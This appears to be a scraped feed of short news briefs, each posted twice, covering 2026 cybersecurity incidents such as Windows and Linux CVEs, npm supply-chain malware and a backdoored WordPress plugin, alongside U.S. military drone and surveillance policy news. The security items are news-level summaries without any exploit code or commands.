π€ Pentagon to Establish Sub-Unified Command for Autonomous Warfare
Secretary of Defense Pete Hegseth announced the U.S. military will soon designate a sub-unified command focused on autonomous warfare, citing the central role of drones in modern combat. The move follows U.S. Southern Command's recent launch of its Autonomous Warfare Command. Hegseth emphasized lessons from Ukraine and Operation Epic Fury as drivers behind the decision.
The Pentagon's fiscal 2027 budget requests $54 billion for autonomous systems, including $39.2 billion for "Drone Dominance" initiatives. Sub-unified command status signals enduring priority, placing autonomous warfare alongside elite structures like Joint Special Operations Command.
π°οΈ Open sources - closed narratives
@sitreports
Secretary of Defense Pete Hegseth announced the U.S. military will soon designate a sub-unified command focused on autonomous warfare, citing the central role of drones in modern combat. The move follows U.S. Southern Command's recent launch of its Autonomous Warfare Command. Hegseth emphasized lessons from Ukraine and Operation Epic Fury as drivers behind the decision.
The Pentagon's fiscal 2027 budget requests $54 billion for autonomous systems, including $39.2 billion for "Drone Dominance" initiatives. Sub-unified command status signals enduring priority, placing autonomous warfare alongside elite structures like Joint Special Operations Command.
π°οΈ Open sources - closed narratives
@sitreports
π« Microsoft Incomplete Patch Spawns New Windows Zero-Day Under Active Exploitation
Microsoft's February fix for CVE-2026-21510, a Windows Shell flaw exploited by Russia's APT28 against Ukraine and EU targets, failed to close a critical authentication coercion vector. The incomplete patch led to CVE-2026-32202, now actively exploited and flagged by CISA's Known Exploited Vulnerabilities catalog with a May 12 federal remediation deadline. The zero-click flaw enables attackers to harvest Net-NTLMv2 hashes via auto-parsed LNK files.
Akamai researchers discovered victim machines still authenticating to attacker servers despite the original RCE fix. The vulnerability permits credential theft and lateral movement without user interaction, representing a credential theft vector directly descended from APT28's original exploit chain.
π°οΈ Open sources - closed narratives
@sitreports
Microsoft's February fix for CVE-2026-21510, a Windows Shell flaw exploited by Russia's APT28 against Ukraine and EU targets, failed to close a critical authentication coercion vector. The incomplete patch led to CVE-2026-32202, now actively exploited and flagged by CISA's Known Exploited Vulnerabilities catalog with a May 12 federal remediation deadline. The zero-click flaw enables attackers to harvest Net-NTLMv2 hashes via auto-parsed LNK files.
Akamai researchers discovered victim machines still authenticating to attacker servers despite the original RCE fix. The vulnerability permits credential theft and lateral movement without user interaction, representing a credential theft vector directly descended from APT28's original exploit chain.
π°οΈ Open sources - closed narratives
@sitreports
π SAP npm Packages Compromised in Supply Chain Attack
Multiple SAP-related npm packages have been compromised with credential-stealing malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to exfiltrate authentication credentials from affected development environments.
The compromise targets the npm supply chain, a critical vector given SAP's widespread enterprise adoption. Organizations using affected packages face immediate exposure risk to credential theft, potentially granting attackers access to corporate SAP environments and sensitive business data.
π°οΈ Open sources - closed narratives
@sitreports
Multiple SAP-related npm packages have been compromised with credential-stealing malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to exfiltrate authentication credentials from affected development environments.
The compromise targets the npm supply chain, a critical vector given SAP's widespread enterprise adoption. Organizations using affected packages face immediate exposure risk to credential theft, potentially granting attackers access to corporate SAP environments and sensitive business data.
π°οΈ Open sources - closed narratives
@sitreports
π NSA-Developed OT Tool Contains XML External Entity Vulnerability
CISA issued advisory on CVE-2026-6807, an XXE vulnerability affecting all versions of GrassMarlin, an NSA-developed network security tool for critical infrastructure and SCADA networks that reached end-of-life in 2017. The flaw stems from insufficient XML parsing hardening in session files, enabling data exfiltration through maliciously crafted .gm3 archives. According to reporting, exploitation requires tricking users into opening weaponized files, with a public PoC demonstrating base64-encoded exfiltration.
No patches forthcoming due to EOL status. CISA recommends network isolation and access hardening. Threat vector limited to phishing scenarios, reducing immediate risk to organizations with mature security awareness programs.
π°οΈ Open sources - closed narratives
@sitreports
CISA issued advisory on CVE-2026-6807, an XXE vulnerability affecting all versions of GrassMarlin, an NSA-developed network security tool for critical infrastructure and SCADA networks that reached end-of-life in 2017. The flaw stems from insufficient XML parsing hardening in session files, enabling data exfiltration through maliciously crafted .gm3 archives. According to reporting, exploitation requires tricking users into opening weaponized files, with a public PoC demonstrating base64-encoded exfiltration.
No patches forthcoming due to EOL status. CISA recommends network isolation and access hardening. Threat vector limited to phishing scenarios, reducing immediate risk to organizations with mature security awareness programs.
π°οΈ Open sources - closed narratives
@sitreports
π€ DPRK Actors Deploy AI-Generated npm Packages in Developer Supply Chain Campaign
North Korean threat actors are distributing malware through npm packages with AI-generated code, alongside fake recruitment firms targeting software developers. The campaign employs remote access trojans to compromise victims through social engineering tactics focused on employment opportunities.
The operation demonstrates continued evolution of DPRK supply chain targeting methods, combining automated code generation with established social engineering frameworks. Developer-focused attack vectors remain a priority objective for revenue generation operations linked to Pyongyang-affiliated groups.
π°οΈ Open sources - closed narratives
@sitreports
North Korean threat actors are distributing malware through npm packages with AI-generated code, alongside fake recruitment firms targeting software developers. The campaign employs remote access trojans to compromise victims through social engineering tactics focused on employment opportunities.
The operation demonstrates continued evolution of DPRK supply chain targeting methods, combining automated code generation with established social engineering frameworks. Developer-focused attack vectors remain a priority objective for revenue generation operations linked to Pyongyang-affiliated groups.
π°οΈ Open sources - closed narratives
@sitreports
π DHS Expanding Predator Drone Fleet for Domestic Surveillance
Customs and Border Protection plans to spend hundreds of millions of dollars on additional high-powered surveillance drones, with other DHS components potentially launching their own MQ-9 fleets, according to procurement records reviewed by 404 Media.
The expansion signals broader integration of military-grade aerial surveillance capabilities across DHS operations beyond traditional border monitoring, potentially establishing parallel drone infrastructure within multiple agency branches.
π°οΈ Open sources - closed narratives
@sitreports
Customs and Border Protection plans to spend hundreds of millions of dollars on additional high-powered surveillance drones, with other DHS components potentially launching their own MQ-9 fleets, according to procurement records reviewed by 404 Media.
The expansion signals broader integration of military-grade aerial surveillance capabilities across DHS operations beyond traditional border monitoring, potentially establishing parallel drone infrastructure within multiple agency branches.
π°οΈ Open sources - closed narratives
@sitreports
π€ LinkedIn AI Hiring Agents Project $450M Annual Revenue
Microsoft-owned LinkedIn announced its agentic AI hiring products are projected to generate $450 million in sales over the next year, according to company statements. The platform's AI agents automate recruitment workflows for corporate clients.
The revenue projection signals rapid enterprise adoption of autonomous AI systems in talent acquisition, positioning LinkedIn to capture significant market share in HR automation. Microsoft's integration strategy appears focused on high-margin B2B services rather than consumer-facing AI products.
π°οΈ Open sources - closed narratives
@sitreports
Microsoft-owned LinkedIn announced its agentic AI hiring products are projected to generate $450 million in sales over the next year, according to company statements. The platform's AI agents automate recruitment workflows for corporate clients.
The revenue projection signals rapid enterprise adoption of autonomous AI systems in talent acquisition, positioning LinkedIn to capture significant market share in HR automation. Microsoft's integration strategy appears focused on high-margin B2B services rather than consumer-facing AI products.
π°οΈ Open sources - closed narratives
@sitreports
π‘ House Speaker Leverages Crypto Provisions to Secure FISA Reauthorization Votes
Speaker Mike Johnson secured Freedom Caucus support for FISA Section 702 renewal by incorporating cryptocurrency-friendly language into the surveillance legislation package, according to reporting by The Intercept. The tactical bundling paired expanded domestic surveillance authorities with reduced regulatory oversight on digital assets.
The legislative strategy faces Senate obstacles where crypto provisions are unlikely to survive committee review, potentially forcing a clean FISA vote. This marks a notable shift in coalition-building tactics where domestic surveillance expansion now requires incentive structures beyond traditional security framing.
π°οΈ Open sources - closed narratives
@sitreports
Speaker Mike Johnson secured Freedom Caucus support for FISA Section 702 renewal by incorporating cryptocurrency-friendly language into the surveillance legislation package, according to reporting by The Intercept. The tactical bundling paired expanded domestic surveillance authorities with reduced regulatory oversight on digital assets.
The legislative strategy faces Senate obstacles where crypto provisions are unlikely to survive committee review, potentially forcing a clean FISA vote. This marks a notable shift in coalition-building tactics where domestic surveillance expansion now requires incentive structures beyond traditional security framing.
π°οΈ Open sources - closed narratives
@sitreports
π« Copy Fail: Linux kernel LPE enables root via 10-line Python script
CVE-2026-31431, dubbed Copy Fail, exploits a flaw in Linux kernel's authencesn cryptographic template allowing unprivileged users to write four controlled bytes into any readable file's page cache. A 732-byte Python exploit can modify setuid binaries to gain root access on nearly all distributions since 2017. Theori researchers identified the vulnerability with AI-assisted scanning, and major distributions have issued patches rated 7.8/10 severity.
Unlike Dirty Cow or Dirty Pipe, the exploit requires no race condition. Primary risk vectors include multi-tenant systems, shared-kernel containers, and CI/CD pipelines executing untrusted code. The page cache sharing mechanism creates potential Kubernetes node escape primitives, expanding impact beyond local privilege escalation scenarios.
π°οΈ Open sources - closed narratives
@sitreports
CVE-2026-31431, dubbed Copy Fail, exploits a flaw in Linux kernel's authencesn cryptographic template allowing unprivileged users to write four controlled bytes into any readable file's page cache. A 732-byte Python exploit can modify setuid binaries to gain root access on nearly all distributions since 2017. Theori researchers identified the vulnerability with AI-assisted scanning, and major distributions have issued patches rated 7.8/10 severity.
Unlike Dirty Cow or Dirty Pipe, the exploit requires no race condition. Primary risk vectors include multi-tenant systems, shared-kernel containers, and CI/CD pipelines executing untrusted code. The page cache sharing mechanism creates potential Kubernetes node escape primitives, expanding impact beyond local privilege escalation scenarios.
π°οΈ Open sources - closed narratives
@sitreports
π« SAP npm Packages Compromised in TeamPCP Supply Chain Attack
Four official SAP npm packages were compromised to deploy credential-stealing malware targeting developers and CI/CD pipelines. The affected packagesβ@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbtβcontained malicious preinstall scripts that extracted npm tokens, SSH keys, cloud credentials, and CI/CD secrets. The malware read runner process memory to bypass security masking and self-propagated by injecting code into other packages using stolen credentials, according to security researchers.
The attack bears medium-confidence attribution to TeamPCP threat actors, who previously compromised Bitwarden and Checkmarx packages using similar tactics.
π°οΈ Open sources - closed narratives
@sitreports
Four official SAP npm packages were compromised to deploy credential-stealing malware targeting developers and CI/CD pipelines. The affected packagesβ@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbtβcontained malicious preinstall scripts that extracted npm tokens, SSH keys, cloud credentials, and CI/CD secrets. The malware read runner process memory to bypass security masking and self-propagated by injecting code into other packages using stolen credentials, according to security researchers.
The attack bears medium-confidence attribution to TeamPCP threat actors, who previously compromised Bitwarden and Checkmarx packages using similar tactics.
π°οΈ Open sources - closed narratives
@sitreports
π« WordPress Plugin Harbored Five-Year Backdoor
Quick Page/Post Redirect plugin, active on over 70,000 WordPress sites, contained a hidden backdoor since 2020 that enabled remote code execution via external update servers. Versions 5.2.1 and 5.2.2 included a self-update mechanism pointing to third-party domain 'anadnet.com', which pushed tampered builds outside WordPress.org's oversight. The backdoor delivered SEO spam to logged-out visitors while maintaining persistent update hooks to attacker infrastructure, according to security researcher Austin Ginder.
WordPress.org has suspended the plugin pending review, leaving 70,000 sites with update checks still pointing to attacker infrastructure despite the dormant command-and-control subdomain no longer resolving.
π°οΈ Open sources - closed narratives
@sitreports
Quick Page/Post Redirect plugin, active on over 70,000 WordPress sites, contained a hidden backdoor since 2020 that enabled remote code execution via external update servers. Versions 5.2.1 and 5.2.2 included a self-update mechanism pointing to third-party domain 'anadnet.com', which pushed tampered builds outside WordPress.org's oversight. The backdoor delivered SEO spam to logged-out visitors while maintaining persistent update hooks to attacker infrastructure, according to security researcher Austin Ginder.
WordPress.org has suspended the plugin pending review, leaving 70,000 sites with update checks still pointing to attacker infrastructure despite the dormant command-and-control subdomain no longer resolving.
π°οΈ Open sources - closed narratives
@sitreports
π‘ ORNL develops portable GPS spoofing detector with equal-strength detection capability
Oak Ridge National Laboratory researchers led by Austin Albright have developed a portable GPS interference detection system capable of identifying both jamming and spoofing attacks. The device uses a software-defined radio and embedded GPU running novel RF analysis algorithms. Critically, according to reporting, the system can detect spoofing even when fake and real signals are equally strongβa capability no known detector currently possesses.
With successful DHS testing for commercial trucking complete, the team is pursuing cost reduction to enable broader deployment across logistics and critical cargo transport sectors where GPS manipulation poses growing operational risks.
π°οΈ Open sources - closed narratives
@sitreports
Oak Ridge National Laboratory researchers led by Austin Albright have developed a portable GPS interference detection system capable of identifying both jamming and spoofing attacks. The device uses a software-defined radio and embedded GPU running novel RF analysis algorithms. Critically, according to reporting, the system can detect spoofing even when fake and real signals are equally strongβa capability no known detector currently possesses.
With successful DHS testing for commercial trucking complete, the team is pursuing cost reduction to enable broader deployment across logistics and critical cargo transport sectors where GPS manipulation poses growing operational risks.
π°οΈ Open sources - closed narratives
@sitreports
π€ Pentagon to Establish Autonomous Warfare Sub-Unified Command
Defense Secretary Pete Hegseth announced plans for a dedicated autonomous warfare sub-unified command during testimony before the House Armed Services Committee on the Pentagon's fiscal 2027 budget request. The organizational structure would centralize oversight of unmanned and AI-enabled systems across military branches.
The move signals institutional recognition that autonomous systems require unified doctrine, training, and operational integration beyond existing service-specific programs. Creation of a sub-unified command structure reflects lessons from Ukraine and accelerating peer competition in unmanned domain awareness, according to reporting from Defense Scoop.
π°οΈ Open sources - closed narratives
@sitreports
Defense Secretary Pete Hegseth announced plans for a dedicated autonomous warfare sub-unified command during testimony before the House Armed Services Committee on the Pentagon's fiscal 2027 budget request. The organizational structure would centralize oversight of unmanned and AI-enabled systems across military branches.
The move signals institutional recognition that autonomous systems require unified doctrine, training, and operational integration beyond existing service-specific programs. Creation of a sub-unified command structure reflects lessons from Ukraine and accelerating peer competition in unmanned domain awareness, according to reporting from Defense Scoop.
π°οΈ Open sources - closed narratives
@sitreports
π« Incomplete Windows Patch Creates New Zero-Click Exploit Vector
Microsoft's February patch for CVE-2026-21510, a zero-day exploited by Russia's APT28 against Ukrainian targets, failed to fully remediate the authentication coercion vulnerability. CISA has now added the resulting flaw, CVE-2026-32202, to its Known Exploited Vulnerabilities catalog after detecting active exploitation. The new bug enables zero-click credential theft via weaponized LNK files, exposing Net-NTLMv2 hashes to attackers without user interaction.
Akamai researchers discovered the bypass during patch validation, noting victim machines continued authenticating to attacker-controlled servers despite the initial fix. The gap between path resolution and trust verification allows credential harvesting and potential lateral movement. Federal agencies face a May 12 remediation deadline.
π°οΈ Open sources - closed narratives
@sitreports
Microsoft's February patch for CVE-2026-21510, a zero-day exploited by Russia's APT28 against Ukrainian targets, failed to fully remediate the authentication coercion vulnerability. CISA has now added the resulting flaw, CVE-2026-32202, to its Known Exploited Vulnerabilities catalog after detecting active exploitation. The new bug enables zero-click credential theft via weaponized LNK files, exposing Net-NTLMv2 hashes to attackers without user interaction.
Akamai researchers discovered the bypass during patch validation, noting victim machines continued authenticating to attacker-controlled servers despite the initial fix. The gap between path resolution and trust verification allows credential harvesting and potential lateral movement. Federal agencies face a May 12 remediation deadline.
π°οΈ Open sources - closed narratives
@sitreports
π« SAP npm Packages Compromised in Mini Shai-Hulud Supply Chain Attack
Multiple SAP-related npm packages have been compromised in a credential-stealing supply chain attack deploying malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to harvest authentication credentials from infected development environments.
The compromise represents a significant risk to enterprise supply chains, particularly organizations integrating SAP modules via Node.js tooling. According to security reporting, the attack demonstrates continued targeting of high-value developer dependencies as a vector for credential theft and lateral movement within corporate networks.
π°οΈ Open sources - closed narratives
@sitreports
Multiple SAP-related npm packages have been compromised in a credential-stealing supply chain attack deploying malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to harvest authentication credentials from infected development environments.
The compromise represents a significant risk to enterprise supply chains, particularly organizations integrating SAP modules via Node.js tooling. According to security reporting, the attack demonstrates continued targeting of high-value developer dependencies as a vector for credential theft and lateral movement within corporate networks.
π°οΈ Open sources - closed narratives
@sitreports
π« XXE Vulnerability in NSA's Abandoned GrassMarlin OT Tool
CISA has flagged CVE-2026-6807, an XML External Entity vulnerability in GrassMarlin, the NSA's open-source network security tool for critical infrastructure and SCADA systems. The flaw enables data exfiltration through maliciously crafted XML session files, with a severity rating of 5.5. GrassMarlin reached end-of-life in 2017, leaving no patches available. A proof-of-concept exploit published by Rapid7 demonstrates base64-encoded file exfiltration via external DTD references.
Operational risk is limited to social engineering requiring victims to open weaponized .gm3 session files. CISA recommends network segmentation and internet isolation for control systems, though no remediation exists for the deprecated tool.
π°οΈ Open sources - closed narratives
@sitreports
CISA has flagged CVE-2026-6807, an XML External Entity vulnerability in GrassMarlin, the NSA's open-source network security tool for critical infrastructure and SCADA systems. The flaw enables data exfiltration through maliciously crafted XML session files, with a severity rating of 5.5. GrassMarlin reached end-of-life in 2017, leaving no patches available. A proof-of-concept exploit published by Rapid7 demonstrates base64-encoded file exfiltration via external DTD references.
Operational risk is limited to social engineering requiring victims to open weaponized .gm3 session files. CISA recommends network segmentation and internet isolation for control systems, though no remediation exists for the deprecated tool.
π°οΈ Open sources - closed narratives
@sitreports
π DPRK Operatives Deploy AI-Generated npm Malware via Fake Companies
North Korean threat actors are leveraging artificial intelligence to inject malicious code into npm packages while posing as legitimate technology firms. The campaign combines social engineering through fabricated corporate identities with RAT deployment to target software developers and supply chain infrastructure, according to reporting from cybersecurity researchers.
The operation marks an evolution in DPRK tradecraft, integrating AI capabilities into package repository compromise tactics. This multi-vector approach expands attack surface beyond traditional phishing, creating persistent access points through trusted developer ecosystems and dependency chains.
π°οΈ Open sources - closed narratives
@sitreports
North Korean threat actors are leveraging artificial intelligence to inject malicious code into npm packages while posing as legitimate technology firms. The campaign combines social engineering through fabricated corporate identities with RAT deployment to target software developers and supply chain infrastructure, according to reporting from cybersecurity researchers.
The operation marks an evolution in DPRK tradecraft, integrating AI capabilities into package repository compromise tactics. This multi-vector approach expands attack surface beyond traditional phishing, creating persistent access points through trusted developer ecosystems and dependency chains.
π°οΈ Open sources - closed narratives
@sitreports
π DHS Expands MQ-9 Drone Procurement
Customs and Border Protection plans to spend hundreds of millions of dollars expanding its fleet of high-powered surveillance drones, with procurement records indicating other DHS components may establish their own Predator-style drone operations. The expansion represents a significant scaling of domestic aerial surveillance infrastructure beyond CBP's current capabilities.
The procurement signals DHS's commitment to large-scale drone surveillance across multiple agency components, potentially extending MQ-9 deployment beyond border monitoring into broader homeland security mission sets.
π°οΈ Open sources - closed narratives
@sitreports
Customs and Border Protection plans to spend hundreds of millions of dollars expanding its fleet of high-powered surveillance drones, with procurement records indicating other DHS components may establish their own Predator-style drone operations. The expansion represents a significant scaling of domestic aerial surveillance infrastructure beyond CBP's current capabilities.
The procurement signals DHS's commitment to large-scale drone surveillance across multiple agency components, potentially extending MQ-9 deployment beyond border monitoring into broader homeland security mission sets.
π°οΈ Open sources - closed narratives
@sitreports
π« Mini Shai-Hulud Campaign Compromises SAP, Intercom, Lightning Packages
Cybercrime group TeamPCP deployed credential-stealing malware across multiple developer packages April 29-30, targeting SAP npm packages (mbt, @cap-js/db-service, @cap-js/postgres, @cap-js/sqlite), Intercom's intercom-client SDK, and PyPI's lightning framework. The malicious code executes on install, harvesting GitHub tokens, npm credentials, cloud secrets, and CI/CD data before encrypting and exfiltrating to attacker-controlled repositories, according to analysis by Wiz and Socket.
The self-propagating payload affects over 932,000 weekly downloads combined, with exposure extending into backend services and CI/CD pipelines across enterprise environments.
π°οΈ Open sources - closed narratives
@sitreports
Cybercrime group TeamPCP deployed credential-stealing malware across multiple developer packages April 29-30, targeting SAP npm packages (mbt, @cap-js/db-service, @cap-js/postgres, @cap-js/sqlite), Intercom's intercom-client SDK, and PyPI's lightning framework. The malicious code executes on install, harvesting GitHub tokens, npm credentials, cloud secrets, and CI/CD data before encrypting and exfiltrating to attacker-controlled repositories, according to analysis by Wiz and Socket.
The self-propagating payload affects over 932,000 weekly downloads combined, with exposure extending into backend services and CI/CD pipelines across enterprise environments.
π°οΈ Open sources - closed narratives
@sitreports
π Pentagon Drone Strategy Faces Integration Crisis
Marine Corps Commandant Gen. Eric Smith and CNO Adm. Daryl Caudle called for ending service-specific drone procurement stovepipes in favor of unified standards. Speaking at Modern Day Marine, Caudle stated the Navy and Marine Corps should not independently build separate autonomous futures, while Smith emphasized the industrial base and budget cannot support duplicative programs.
The push comes as DOD's $1.1B Drone Dominance Program aims to field 300,000 weaponized drones by 2027, with FY2027 proposing $54.6B for the Defense Autonomous Warfare Group. Caudle suggested a future robotic and autonomous systems commander role, while Hegseth indicated plans for a new sub-unified command structure remain under development.
π°οΈ Open sources - closed narratives
@sitreports
Marine Corps Commandant Gen. Eric Smith and CNO Adm. Daryl Caudle called for ending service-specific drone procurement stovepipes in favor of unified standards. Speaking at Modern Day Marine, Caudle stated the Navy and Marine Corps should not independently build separate autonomous futures, while Smith emphasized the industrial base and budget cannot support duplicative programs.
The push comes as DOD's $1.1B Drone Dominance Program aims to field 300,000 weaponized drones by 2027, with FY2027 proposing $54.6B for the Defense Autonomous Warfare Group. Caudle suggested a future robotic and autonomous systems commander role, while Hegseth indicated plans for a new sub-unified command structure remain under development.
π°οΈ Open sources - closed narratives
@sitreports
π€ AI-Driven Phishing Campaigns Hit 86 Percent of All Attacks
KnowBe4's latest threat trends report reveals that 86 percent of phishing campaigns tracked over the past six months incorporated artificial intelligence, marking a steady climb from 80 percent in 2024. AI is now automating reconnaissance, generating hyper-personalized lures, and enabling multi-vector attacks that combine emails with malicious calendar invites and fake Microsoft Teams messages impersonating IT support staff.
The operational shift is significant: according to Microsoft's data, AI-generated phishing is 4.5 times more effective than human-crafted campaigns. Attackers are moving beyond basic email lures to polymorphic, multi-stage operations that harvest credentials through automated social engineering across enterprise communication platforms.
π°οΈ Open sources - closed narratives
@sitreports
KnowBe4's latest threat trends report reveals that 86 percent of phishing campaigns tracked over the past six months incorporated artificial intelligence, marking a steady climb from 80 percent in 2024. AI is now automating reconnaissance, generating hyper-personalized lures, and enabling multi-vector attacks that combine emails with malicious calendar invites and fake Microsoft Teams messages impersonating IT support staff.
The operational shift is significant: according to Microsoft's data, AI-generated phishing is 4.5 times more effective than human-crafted campaigns. Attackers are moving beyond basic email lures to polymorphic, multi-stage operations that harvest credentials through automated social engineering across enterprise communication platforms.
π°οΈ Open sources - closed narratives
@sitreports